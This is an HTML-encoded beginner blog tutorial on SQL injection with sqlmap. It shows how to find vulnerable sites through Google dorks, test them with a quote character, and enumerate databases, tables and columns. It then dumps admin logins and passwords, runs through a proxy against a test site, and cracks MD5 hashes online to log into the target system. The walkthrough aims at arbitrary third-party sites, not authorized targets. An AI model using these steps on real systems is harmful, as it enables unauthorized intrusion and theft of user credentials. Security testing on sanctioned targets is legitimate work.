&lt;b style="box-sizing: border-box;"&gt;&lt;span lang="EN-US" style="box-sizing: border-box; font-family: Georgia, 'Times New Roman', serif; line-height: 12.649999618530273px;"&gt;&lt;span style="box-sizing: border-box; color: red;"&gt;INTRODUCTION&lt;/span&gt;&lt;o:p style="box-sizing: border-box;"&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;
&lt;div class="MsoNoSpacing" style="background-color: #fdfdfd; box-sizing: border-box; color: #333333; font-family: Verdana, Geneva, sans-serif; font-size: 11px; line-height: 17.600000381469727px;"&gt;
&lt;span lang="EN-US" style="box-sizing: border-box; font-family: Georgia, 'Times New Roman', serif;"&gt;Structured Query Language is the standard declarative language for relational databases. This allows for its simplicity and ease of use.&lt;o:p style="box-sizing: border-box;"&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class="MsoNoSpacing" style="background-color: #fdfdfd; box-sizing: border-box; color: #333333; font-family: Verdana, Geneva, sans-serif; font-size: 11px; line-height: 17.600000381469727px;"&gt;
&lt;span lang="EN-US" style="box-sizing: border-box; font-family: Georgia, 'Times New Roman', serif;"&gt;SQL was originally developed in the early 70s at IBM labs.&lt;o:p style="box-sizing: border-box;"&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class="MsoNoSpacing" style="background-color: #fdfdfd; box-sizing: border-box; color: #333333; font-family: Verdana, Geneva, sans-serif; font-size: 11px; line-height: 17.600000381469727px;"&gt;
&lt;span lang="EN-US" style="box-sizing: border-box; font-family: Georgia, 'Times New Roman', serif;"&gt;SQLMAP is a tool used for this type of vulnerability.&lt;o:p style="box-sizing: border-box;"&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class="MsoNoSpacing" style="background-color: #fdfdfd; box-sizing: border-box; color: #333333; font-family: Verdana, Geneva, sans-serif; font-size: 11px; line-height: 17.600000381469727px;"&gt;
&lt;span lang="EN-US" style="box-sizing: border-box; font-family: Georgia, 'Times New Roman', serif;"&gt;It is Open source, and often is used for Penetration Testing that enable intrusions on fragile DBMS written in Python. It provides functions to detect and exploit vulnerabilities of SQLI. Let's use the example sqlmap.py, widely used in operating systems and databases.&lt;o:p style="box-sizing: border-box;"&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class="MsoNoSpacing" style="background-color: #fdfdfd; box-sizing: border-box; color: #333333; font-family: Verdana, Geneva, sans-serif; font-size: 11px; line-height: 17.600000381469727px;"&gt;
&lt;span style="box-sizing: border-box; font-family: Georgia, 'Times New Roman', serif;"&gt;&lt;br style="box-sizing: border-box;" /&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class="MsoNoSpacing" style="background-color: #fdfdfd; box-sizing: border-box; color: #333333; font-family: Verdana, Geneva, sans-serif; font-size: 11px; line-height: 17.600000381469727px;"&gt;
&lt;b style="box-sizing: border-box;"&gt;&lt;span lang="EN-US" style="box-sizing: border-box; font-family: Georgia, 'Times New Roman', serif;"&gt;&lt;span style="box-sizing: border-box; color: red;"&gt;STEP BY STEP&lt;/span&gt;&lt;o:p style="box-sizing: border-box;"&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;
&lt;div class="MsoNoSpacing" style="background-color: #fdfdfd; box-sizing: border-box; color: #333333; font-family: Verdana, Geneva, sans-serif; font-size: 11px; line-height: 17.600000381469727px;"&gt;
&lt;span lang="EN-US" style="box-sizing: border-box; font-family: Georgia, 'Times New Roman', serif;"&gt;Readers I will try to explain this in the simplest possible way.&lt;o:p style="box-sizing: border-box;"&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class="MsoNoSpacing" style="background-color: #fdfdfd; box-sizing: border-box; color: #333333; font-family: Verdana, Geneva, sans-serif; font-size: 11px; line-height: 17.600000381469727px;"&gt;
&lt;span style="box-sizing: border-box; font-family: Georgia, 'Times New Roman', serif;"&gt;&lt;br style="box-sizing: border-box;" /&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class="MsoNoSpacing" style="background-color: #fdfdfd; box-sizing: border-box; color: #333333; font-family: Verdana, Geneva, sans-serif; font-size: 11px; line-height: 17.600000381469727px;"&gt;
&lt;span style="box-sizing: border-box; font-family: Georgia, 'Times New Roman', serif;"&gt;&lt;span lang="EN-US" style="box-sizing: border-box;"&gt;You must have a vulnerable target, to find out if the target is vulnerable just input&amp;nbsp;&lt;/span&gt;&lt;b style="box-sizing: border-box;"&gt;&lt;span lang="EN-US" style="box-sizing: border-box;"&gt;'&lt;/span&gt;&lt;/b&gt;&lt;span lang="EN-US" style="box-sizing: border-box;"&gt;&amp;nbsp;&lt;/span&gt;&lt;span lang="EN-US" style="box-sizing: border-box;"&gt;at the end of the&amp;nbsp;&lt;/span&gt;&lt;span lang="EN-US" style="box-sizing: border-box;"&gt;URL&lt;/span&gt;&lt;span lang="EN-US" style="box-sizing: border-box;"&gt;&amp;nbsp;being tested and press "&lt;/span&gt;&lt;span lang="EN-US" style="box-sizing: border-box;"&gt;Enter&lt;/span&gt;&lt;span lang="EN-US" style="box-sizing: border-box;"&gt;" if some error is returned the database is vulnerable.&lt;o:p style="box-sizing: border-box;"&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class="MsoNoSpacing" style="background-color: #fdfdfd; box-sizing: border-box; color: #333333; font-family: Verdana, Geneva, sans-serif; font-size: 11px; line-height: 17.600000381469727px;"&gt;
&lt;span lang="EN-US" style="box-sizing: border-box; font-family: Georgia, 'Times New Roman', serif;"&gt;You can use google to find it with some dork. Example:&amp;nbsp;&lt;b style="box-sizing: border-box;"&gt;inurl: news.php id = 1?&lt;/b&gt;&lt;o:p style="box-sizing: border-box;"&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class="MsoNoSpacing" style="background-color: #fdfdfd; box-sizing: border-box; color: #333333; font-family: Verdana, Geneva, sans-serif; font-size: 11px; line-height: 17.600000381469727px;"&gt;
&lt;span lang="EN-US" style="box-sizing: border-box; font-family: Georgia, 'Times New Roman', serif;"&gt;There is a bank of&amp;nbsp;&lt;b style="box-sizing: border-box;"&gt;google dorks&lt;/b&gt;&amp;nbsp;data and several other possibilities that can be used to filter your search.&lt;o:p style="box-sizing: border-box;"&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class="MsoNoSpacing" style="background-color: #fdfdfd; box-sizing: border-box; color: #333333; font-family: Verdana, Geneva, sans-serif; font-size: 11px; line-height: 17.600000381469727px;"&gt;
&lt;span style="box-sizing: border-box; font-family: Georgia, 'Times New Roman', serif;"&gt;&lt;br style="box-sizing: border-box;" /&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class="MsoNoSpacing" style="background-color: #fdfdfd; box-sizing: border-box; color: #333333; font-family: Verdana, Geneva, sans-serif; font-size: 11px; line-height: 17.600000381469727px;"&gt;
&lt;b style="box-sizing: border-box;"&gt;&lt;span lang="EN-US" style="box-sizing: border-box; font-family: Georgia, 'Times New Roman', serif;"&gt;&lt;span style="box-sizing: border-box; color: #0c343d;"&gt;cd /pentest/database/sqlmap&lt;/span&gt;&lt;o:p style="box-sizing: border-box;"&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;
&lt;div class="MsoNoSpacing" style="background-color: #fdfdfd; box-sizing: border-box; color: #333333; font-family: Verdana, Geneva, sans-serif; font-size: 11px; line-height: 17.600000381469727px;"&gt;
&lt;span style="box-sizing: border-box; font-family: Georgia, 'Times New Roman', serif;"&gt;&lt;br style="box-sizing: border-box;" /&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class="MsoNoSpacing" style="background-color: #fdfdfd; box-sizing: border-box; color: #333333; font-family: Verdana, Geneva, sans-serif; font-size: 11px; line-height: 17.600000381469727px;"&gt;
&lt;span lang="EN-US" style="box-sizing: border-box; font-family: Georgia, 'Times New Roman', serif;"&gt;We will now begin the game, to view the menu for sqlmap.py use the command&amp;nbsp;&lt;b style="box-sizing: border-box;"&gt;./sqlmap.py -h&lt;/b&gt;&lt;o:p style="box-sizing: border-box;"&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class="MsoNoSpacing" style="background-color: #fdfdfd; box-sizing: border-box; color: #333333; font-family: Verdana, Geneva, sans-serif; font-size: 11px; line-height: 17.600000381469727px;"&gt;
&lt;span style="box-sizing: border-box; font-family: Georgia, 'Times New Roman', serif;"&gt;&lt;br style="box-sizing: border-box;" /&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class="MsoNoSpacing" style="background-color: #fdfdfd; box-sizing: border-box; color: #333333; font-family: Verdana, Geneva, sans-serif; font-size: 11px; line-height: 17.600000381469727px;"&gt;
&lt;span lang="EN-US" style="box-sizing: border-box; font-family: Georgia, 'Times New Roman', serif;"&gt;Let's run sqlmap.py, the parameter [--dbs], to search the all databases in DBMS.&lt;o:p style="box-sizing: border-box;"&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class="MsoNoSpacing" style="background-color: #fdfdfd; box-sizing: border-box; color: #333333; font-family: Verdana, Geneva, sans-serif; font-size: 11px; line-height: 17.600000381469727px;"&gt;
&lt;span style="box-sizing: border-box; font-family: Georgia, 'Times New Roman', serif;"&gt;&lt;br style="box-sizing: border-box;" /&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class="MsoNoSpacing" style="background-color: #fdfdfd; box-sizing: border-box; color: #333333; font-family: Verdana, Geneva, sans-serif; font-size: 11px; line-height: 17.600000381469727px;"&gt;
&lt;span style="box-sizing: border-box; font-family: Georgia, 'Times New Roman', serif;"&gt;&lt;v:shape id="Imagem_x0020_2" o:spid="_x0000_i1039" style="box-sizing: border-box; height: 252pt; visibility: visible; width: 456.75pt;" type="#_x0000_t75"&gt;&lt;v:imagedata o:title="" src="file:///C:\Users\REPSAN~1\AppData\Local\Temp\msohtmlclip1\01\clip_image002.png" style="box-sizing: border-box;"&gt;&lt;/v:imagedata&gt;&lt;/v:shape&gt;&lt;span lang="EN-US" style="box-sizing: border-box;"&gt;&lt;o:p style="box-sizing: border-box;"&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class="MsoNoSpacing" style="background-color: #fdfdfd; box-sizing: border-box; color: #333333; font-family: Verdana, Geneva, sans-serif; font-size: 11px; line-height: 17.600000381469727px;"&gt;
&lt;span style="box-sizing: border-box; font-family: Georgia, 'Times New Roman', serif;"&gt;&lt;br style="box-sizing: border-box;" /&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class="MsoNoSpacing" style="background-color: #fdfdfd; box-sizing: border-box; color: #333333; font-family: Verdana, Geneva, sans-serif; font-size: 11px; line-height: 17.600000381469727px;"&gt;
&lt;span lang="EN-US" style="box-sizing: border-box; font-family: Georgia, 'Times New Roman', serif;"&gt;Or use the parameter&amp;nbsp;&lt;b style="box-sizing: border-box;"&gt;--current-db&lt;/b&gt;&amp;nbsp;to show the databases that are being used.&lt;o:p style="box-sizing: border-box;"&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class="MsoNoSpacing" style="background-color: #fdfdfd; box-sizing: border-box; color: #333333; font-family: Verdana, Geneva, sans-serif; font-size: 11px; line-height: 17.600000381469727px;"&gt;
&lt;span style="box-sizing: border-box; font-family: Georgia, 'Times New Roman', serif;"&gt;&lt;v:shape id="Imagem_x0020_3" o:spid="_x0000_i1038" style="box-sizing: border-box; height: 255pt; visibility: visible; width: 451.5pt;" type="#_x0000_t75"&gt;&lt;v:imagedata o:title="" src="file:///C:\Users\REPSAN~1\AppData\Local\Temp\msohtmlclip1\01\clip_image003.png" style="box-sizing: border-box;"&gt;&lt;/v:imagedata&gt;&lt;/v:shape&gt;&lt;span lang="EN-US" style="box-sizing: border-box;"&gt;&lt;o:p style="box-sizing: border-box;"&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class="MsoNoSpacing" style="background-color: #fdfdfd; box-sizing: border-box; color: #333333; font-family: Verdana, Geneva, sans-serif; font-size: 11px; line-height: 17.600000381469727px;"&gt;
&lt;span style="box-sizing: border-box; font-family: Georgia, 'Times New Roman', serif;"&gt;&lt;br style="box-sizing: border-box;" /&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class="MsoNoSpacing" style="background-color: #fdfdfd; box-sizing: border-box; color: #333333; font-family: Verdana, Geneva, sans-serif; font-size: 11px; line-height: 17.600000381469727px;"&gt;
&lt;span lang="EN-US" style="box-sizing: border-box; font-family: Georgia, 'Times New Roman', serif;"&gt;The parameter&amp;nbsp;&lt;b style="box-sizing: border-box;"&gt;-D&lt;/b&gt;&amp;nbsp;is for the target of database and&amp;nbsp;&lt;b style="box-sizing: border-box;"&gt;--tables&lt;/b&gt;&amp;nbsp;is tables list.&lt;o:p style="box-sizing: border-box;"&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class="MsoNoSpacing" style="background-color: #fdfdfd; box-sizing: border-box; color: #333333; font-family: Verdana, Geneva, sans-serif; font-size: 11px; line-height: 17.600000381469727px;"&gt;
&lt;span style="box-sizing: border-box; font-family: Georgia, 'Times New Roman', serif;"&gt;&lt;v:shape id="Imagem_x0020_4" o:spid="_x0000_i1037" style="box-sizing: border-box; height: 154.5pt; visibility: visible; width: 425.25pt;" type="#_x0000_t75"&gt;&lt;v:imagedata o:title="" src="file:///C:\Users\REPSAN~1\AppData\Local\Temp\msohtmlclip1\01\clip_image004.png" style="box-sizing: border-box;"&gt;&lt;/v:imagedata&gt;&lt;/v:shape&gt;&lt;span lang="EN-US" style="box-sizing: border-box;"&gt;&lt;o:p style="box-sizing: border-box;"&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class="MsoNoSpacing" style="background-color: #fdfdfd; box-sizing: border-box; color: #333333; font-family: Verdana, Geneva, sans-serif; font-size: 11px; line-height: 17.600000381469727px;"&gt;
&lt;span style="box-sizing: border-box; font-family: Georgia, 'Times New Roman', serif;"&gt;&lt;br style="box-sizing: border-box;" /&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class="MsoNoSpacing" style="background-color: #fdfdfd; box-sizing: border-box; color: #333333; font-family: Verdana, Geneva, sans-serif; font-size: 11px; line-height: 17.600000381469727px;"&gt;
&lt;span style="box-sizing: border-box; font-family: Georgia, 'Times New Roman', serif;"&gt;&lt;v:shape id="Imagem_x0020_5" o:spid="_x0000_i1036" style="box-sizing: border-box; height: 213.75pt; visibility: visible; width: 425.25pt;" type="#_x0000_t75"&gt;&lt;v:imagedata o:title="" src="file:///C:\Users\REPSAN~1\AppData\Local\Temp\msohtmlclip1\01\clip_image005.png" style="box-sizing: border-box;"&gt;&lt;/v:imagedata&gt;&lt;/v:shape&gt;&lt;span lang="EN-US" style="box-sizing: border-box;"&gt;&lt;o:p style="box-sizing: border-box;"&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class="MsoNoSpacing" style="background-color: #fdfdfd; box-sizing: border-box; color: #333333; font-family: Verdana, Geneva, sans-serif; font-size: 11px; line-height: 17.600000381469727px;"&gt;
&lt;span style="box-sizing: border-box; font-family: Georgia, 'Times New Roman', serif;"&gt;&lt;br style="box-sizing: border-box;" /&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class="MsoNoSpacing" style="background-color: #fdfdfd; box-sizing: border-box; color: #333333; font-family: Verdana, Geneva, sans-serif; font-size: 11px; line-height: 17.600000381469727px;"&gt;
&lt;span lang="EN-US" style="box-sizing: border-box; font-family: Georgia, 'Times New Roman', serif;"&gt;We will verify the existence of interesting information in the table (&lt;b style="box-sizing: border-box;"&gt;admin_users&lt;/b&gt;), time to list the columns. The parameter is&amp;nbsp;&lt;b style="box-sizing: border-box;"&gt;–columns&lt;/b&gt;.&lt;o:p style="box-sizing: border-box;"&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class="MsoNoSpacing" style="background-color: #fdfdfd; box-sizing: border-box; color: #333333; font-family: Verdana, Geneva, sans-serif; font-size: 11px; line-height: 17.600000381469727px;"&gt;
&lt;span style="box-sizing: border-box; font-family: Georgia, 'Times New Roman', serif;"&gt;&lt;v:shape id="Imagem_x0020_6" o:spid="_x0000_i1035" style="box-sizing: border-box; height: 54pt; visibility: visible; width: 425.25pt;" type="#_x0000_t75"&gt;&lt;v:imagedata o:title="" src="file:///C:\Users\REPSAN~1\AppData\Local\Temp\msohtmlclip1\01\clip_image006.png" style="box-sizing: border-box;"&gt;&lt;/v:imagedata&gt;&lt;/v:shape&gt;&lt;span lang="EN-US" style="box-sizing: border-box;"&gt;&lt;o:p style="box-sizing: border-box;"&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class="MsoNoSpacing" style="background-color: #fdfdfd; box-sizing: border-box; color: #333333; font-family: Verdana, Geneva, sans-serif; font-size: 11px; line-height: 17.600000381469727px;"&gt;
&lt;span style="box-sizing: border-box; font-family: Georgia, 'Times New Roman', serif;"&gt;&lt;br style="box-sizing: border-box;" /&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class="MsoNoSpacing" style="background-color: #fdfdfd; box-sizing: border-box; color: #333333; font-family: Verdana, Geneva, sans-serif; font-size: 11px; line-height: 17.600000381469727px;"&gt;
&lt;span lang="EN-US" style="box-sizing: border-box; font-family: Georgia, 'Times New Roman', serif;"&gt;It is important to always indicate the target database (&lt;b style="box-sizing: border-box;"&gt;-D&lt;/b&gt;) data before listing the tables because if you do not do this (without the -D) it will list all tables in all databases.&lt;o:p style="box-sizing: border-box;"&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class="MsoNoSpacing" style="background-color: #fdfdfd; box-sizing: border-box; color: #333333; font-family: Verdana, Geneva, sans-serif; font-size: 11px; line-height: 17.600000381469727px;"&gt;
&lt;span style="box-sizing: border-box; font-family: Georgia, 'Times New Roman', serif;"&gt;&lt;v:shape id="Imagem_x0020_7" o:spid="_x0000_i1034" style="box-sizing: border-box; height: 207.75pt; visibility: visible; width: 424.5pt;" type="#_x0000_t75"&gt;&lt;v:imagedata o:title="" src="file:///C:\Users\REPSAN~1\AppData\Local\Temp\msohtmlclip1\01\clip_image007.png" style="box-sizing: border-box;"&gt;&lt;/v:imagedata&gt;&lt;/v:shape&gt;&lt;span lang="EN-US" style="box-sizing: border-box;"&gt;&lt;o:p style="box-sizing: border-box;"&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class="MsoNoSpacing" style="background-color: #fdfdfd; box-sizing: border-box; color: #333333; font-family: Verdana, Geneva, sans-serif; font-size: 11px; line-height: 17.600000381469727px;"&gt;
&lt;span style="box-sizing: border-box; font-family: Georgia, 'Times New Roman', serif;"&gt;&lt;b style="box-sizing: border-box;"&gt;&lt;span lang="EN-US" style="box-sizing: border-box;"&gt;-T&lt;/span&gt;&lt;/b&gt;&lt;span lang="EN-US" style="box-sizing: border-box;"&gt;&amp;nbsp;= target table&lt;o:p style="box-sizing: border-box;"&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class="MsoNoSpacing" style="background-color: #fdfdfd; box-sizing: border-box; color: #333333; font-family: Verdana, Geneva, sans-serif; font-size: 11px; line-height: 17.600000381469727px;"&gt;
&lt;span style="box-sizing: border-box; font-family: Georgia, 'Times New Roman', serif;"&gt;&lt;b style="box-sizing: border-box;"&gt;&lt;span lang="EN-US" style="box-sizing: border-box;"&gt;-C&lt;/span&gt;&lt;/b&gt;&lt;span lang="EN-US" style="box-sizing: border-box;"&gt;&amp;nbsp;= target columns, can be more than one column to be chosen. Example: username, password.&lt;o:p style="box-sizing: border-box;"&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class="MsoNoSpacing" style="background-color: #fdfdfd; box-sizing: border-box; color: #333333; font-family: Verdana, Geneva, sans-serif; font-size: 11px; line-height: 17.600000381469727px;"&gt;
&lt;span style="box-sizing: border-box; font-family: Georgia, 'Times New Roman', serif;"&gt;&lt;b style="box-sizing: border-box;"&gt;&lt;span lang="EN-US" style="box-sizing: border-box;"&gt;--dump&lt;/span&gt;&lt;/b&gt;&lt;span lang="EN-US" style="box-sizing: border-box;"&gt;&amp;nbsp;= obtain, extract data.&lt;o:p style="box-sizing: border-box;"&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class="MsoNoSpacing" style="background-color: #fdfdfd; box-sizing: border-box; color: #333333; font-family: Verdana, Geneva, sans-serif; font-size: 11px; line-height: 17.600000381469727px;"&gt;
&lt;span style="box-sizing: border-box; font-family: Georgia, 'Times New Roman', serif;"&gt;&lt;v:shape id="Imagem_x0020_8" o:spid="_x0000_i1033" style="box-sizing: border-box; height: 108.75pt; visibility: visible; width: 425.25pt;" type="#_x0000_t75"&gt;&lt;v:imagedata o:title="" src="file:///C:\Users\REPSAN~1\AppData\Local\Temp\msohtmlclip1\01\clip_image008.png" style="box-sizing: border-box;"&gt;&lt;/v:imagedata&gt;&lt;/v:shape&gt;&lt;span lang="EN-US" style="box-sizing: border-box;"&gt;&lt;o:p style="box-sizing: border-box;"&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class="MsoNoSpacing" style="background-color: #fdfdfd; box-sizing: border-box; color: #333333; font-family: Verdana, Geneva, sans-serif; font-size: 11px; line-height: 17.600000381469727px;"&gt;
&lt;span lang="EN-US" style="box-sizing: border-box; font-family: Georgia, 'Times New Roman', serif;"&gt;Important to remember the parameter&amp;nbsp;&lt;b style="box-sizing: border-box;"&gt;--proxy:&lt;/b&gt;&amp;nbsp;enables use of proxy.&amp;nbsp;&amp;nbsp;&lt;o:p style="box-sizing: border-box;"&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;br style="box-sizing: border-box;" /&gt;&lt;span lang="EN-US" style="box-sizing: border-box; font-family: Georgia, 'Times New Roman', serif;"&gt;&lt;br style="box-sizing: border-box;" /&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class="MsoNoSpacing" style="background-color: #fdfdfd; box-sizing: border-box; color: #333333; font-family: Verdana, Geneva, sans-serif; font-size: 11px; line-height: 17.600000381469727px;"&gt;
&lt;span lang="EN-US" style="box-sizing: border-box; font-family: Georgia, 'Times New Roman', serif;"&gt;&lt;b style="box-sizing: border-box;"&gt;&lt;span style="box-sizing: border-box; color: red;"&gt;Example:&lt;/span&gt;&amp;nbsp;&amp;nbsp;&lt;span style="box-sizing: border-box; color: #0c343d;"&gt;/sqlmap.py --url "http://testphp.vulnweb.com/listproducts.php?cat=1" --dbs --proxy=http://183.223.10.108:80&lt;/span&gt;&lt;o:p style="box-sizing: border-box;"&gt;&lt;/o:p&gt;&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class="MsoNoSpacing" style="background-color: #fdfdfd; box-sizing: border-box; color: #333333; font-family: Verdana, Geneva, sans-serif; font-size: 11px; line-height: 17.600000381469727px;"&gt;
&lt;span style="box-sizing: border-box; font-family: Georgia, 'Times New Roman', serif;"&gt;&lt;v:shape id="Imagem_x0020_9" o:spid="_x0000_i1032" style="box-sizing: border-box; height: 194.25pt; visibility: visible; width: 425.25pt;" type="#_x0000_t75"&gt;&lt;v:imagedata o:title="" src="file:///C:\Users\REPSAN~1\AppData\Local\Temp\msohtmlclip1\01\clip_image009.png" style="box-sizing: border-box;"&gt;&lt;/v:imagedata&gt;&lt;/v:shape&gt;&lt;span lang="EN-US" style="box-sizing: border-box;"&gt;&lt;o:p style="box-sizing: border-box;"&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class="MsoNoSpacing" style="background-color: #fdfdfd; box-sizing: border-box; color: #333333; font-family: Verdana, Geneva, sans-serif; font-size: 11px; line-height: 17.600000381469727px;"&gt;
&lt;span style="box-sizing: border-box; font-family: Georgia, 'Times New Roman', serif;"&gt;&lt;br style="box-sizing: border-box;" /&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class="MsoNoSpacing" style="background-color: #fdfdfd; box-sizing: border-box; color: #333333; font-family: Verdana, Geneva, sans-serif; font-size: 11px; line-height: 17.600000381469727px;"&gt;
&lt;span lang="EN-US" style="box-sizing: border-box; font-family: Georgia, 'Times New Roman', serif;"&gt;Readers, I think that's the basics for beginners. sqlmap.py also has many interesting functions, I suggest researching about&amp;nbsp;&lt;b style="box-sizing: border-box;"&gt;--prefix=PREFIX, --postfix=POSTFIX and takeover&lt;/b&gt;&amp;nbsp;options.&lt;o:p style="box-sizing: border-box;"&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class="MsoNoSpacing" style="background-color: #fdfdfd; box-sizing: border-box; color: #333333; font-family: Verdana, Geneva, sans-serif; font-size: 11px; line-height: 17.600000381469727px;"&gt;
&lt;span lang="EN-US" style="box-sizing: border-box; font-family: Georgia, 'Times New Roman', serif;"&gt;More information about the program and videos of them in action on the official site.&lt;o:p style="box-sizing: border-box;"&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class="MsoNoSpacing" style="background-color: #fdfdfd; box-sizing: border-box; color: #333333; font-family: Verdana, Geneva, sans-serif; font-size: 11px; line-height: 17.600000381469727px;"&gt;
&lt;span style="box-sizing: border-box; font-family: Georgia, 'Times New Roman', serif;"&gt;&lt;v:shape id="Imagem_x0020_10" o:spid="_x0000_i1031" style="box-sizing: border-box; height: 181.5pt; visibility: visible; width: 425.25pt;" type="#_x0000_t75"&gt;&lt;v:imagedata o:title="" src="file:///C:\Users\REPSAN~1\AppData\Local\Temp\msohtmlclip1\01\clip_image010.png" style="box-sizing: border-box;"&gt;&lt;/v:imagedata&gt;&lt;/v:shape&gt;&lt;span lang="EN-US" style="box-sizing: border-box;"&gt;&lt;o:p style="box-sizing: border-box;"&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class="MsoNoSpacing" style="background-color: #fdfdfd; box-sizing: border-box; color: #333333; font-family: Verdana, Geneva, sans-serif; font-size: 11px; line-height: 17.600000381469727px;"&gt;
&lt;span style="box-sizing: border-box; font-family: Georgia, 'Times New Roman', serif;"&gt;&lt;br style="box-sizing: border-box;" /&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class="MsoNoSpacing" style="background-color: #fdfdfd; box-sizing: border-box; color: #333333; font-family: Verdana, Geneva, sans-serif; font-size: 11px; line-height: 17.600000381469727px;"&gt;
&lt;span style="box-sizing: border-box; font-family: Georgia, 'Times New Roman', serif;"&gt;&lt;b style="box-sizing: border-box;"&gt;&lt;span lang="EN-US" style="box-sizing: border-box;"&gt;--dump&lt;/span&gt;&lt;/b&gt;&lt;span lang="EN-US" style="box-sizing: border-box;"&gt;&amp;nbsp;is to extract the data from the site but is not given any, this must be within the selected column, and you have to choosen what to extract from the column, where I extracted the logins and passwords are saved within the column.&lt;o:p style="box-sizing: border-box;"&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class="MsoNoSpacing" style="background-color: #fdfdfd; box-sizing: border-box; color: #333333; font-family: Verdana, Geneva, sans-serif; font-size: 11px; line-height: 17.600000381469727px;"&gt;
&lt;span style="box-sizing: border-box; font-family: Georgia, 'Times New Roman', serif;"&gt;&lt;br style="box-sizing: border-box;" /&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class="MsoNoSpacing" style="background-color: #fdfdfd; box-sizing: border-box; color: #333333; font-family: Verdana, Geneva, sans-serif; font-size: 11px; line-height: 17.600000381469727px;"&gt;
&lt;span lang="EN-US" style="box-sizing: border-box; font-family: Georgia, 'Times New Roman', serif;"&gt;Generally, the field of "passwords" DBMS are encrypted.&lt;o:p style="box-sizing: border-box;"&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class="MsoNoSpacing" style="background-color: #fdfdfd; box-sizing: border-box; color: #333333; font-family: Verdana, Geneva, sans-serif; font-size: 11px; line-height: 17.600000381469727px;"&gt;
&lt;span lang="EN-US" style="box-sizing: border-box; font-family: Georgia, 'Times New Roman', serif;"&gt;We then need to decrypt the passwords in order to access the target system.&lt;o:p style="box-sizing: border-box;"&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class="MsoNoSpacing" style="background-color: #fdfdfd; box-sizing: border-box; color: #333333; font-family: Verdana, Geneva, sans-serif; font-size: 11px; line-height: 17.600000381469727px;"&gt;
&lt;span style="box-sizing: border-box; font-family: Georgia, 'Times New Roman', serif;"&gt;&lt;span lang="EN-US" style="box-sizing: border-box;"&gt;We can find a way to log into the system. But wait, the passwords are encrypted in MD5, hahahaha put your hash on:&lt;/span&gt;&lt;a href="http://www.md5decrypt.org/" style="-webkit-transition: all 0.4s ease-in-out; box-sizing: border-box; color: #999999; text-decoration: none; transition: all 0.4s ease-in-out;"&gt;&lt;span lang="EN-US" style="box-sizing: border-box;"&gt;http://www.md5decrypt.org&lt;/span&gt;&lt;/a&gt;&lt;span lang="EN-US" style="box-sizing: border-box;"&gt;&amp;nbsp;and may be decrypted or otherwise&lt;o:p style="box-sizing: border-box;"&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
